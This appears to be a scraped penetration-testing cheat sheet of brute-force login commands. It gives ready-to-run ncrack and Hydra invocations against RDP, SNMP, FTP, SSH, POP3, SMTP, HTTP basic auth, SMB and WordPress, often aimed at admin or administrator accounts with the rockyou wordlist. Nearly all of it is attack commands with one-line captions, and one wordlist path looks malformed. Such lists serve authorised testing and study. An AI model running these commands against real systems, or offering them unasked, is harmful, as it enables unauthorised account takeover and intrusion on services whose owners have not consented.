Brute forcing protocols/services
Ncrack
ncrack can brute force RDP.
|
1 2 |
ncrack -vv --user user1 -P password-file.txt rdp://$ip |
Hydra
Hydra brute force against SNMP
|
1 2 |
hydra -P password-file.txt -v $ip snmp |
Hydra FTP known user and rockyou password list
|
1 2 |
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp |
Hydra SSH using list of users and passwords
|
1 2 |
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh |
Hydra SSH using a known password and a username list
|
1 2 |
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh |
Hydra SSH Against Known username on port 22
|
1 2 |
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt |
Hydra POP3 Brute Force
|
1 2 |
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V |
Hydra SMTP Brute Force
|
1 2 |
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V |
Hydra attack http get 401 login with a dictionary
|
1 2 |
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin |
Hydra attack Windows Remote Desktop with rockyou
|
1 2 |
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip |
Hydra brute force SMB user with rockyou:
|
1 2 |
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb |
Hydra brute force a WordPress admin login
|
1 2 |
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' |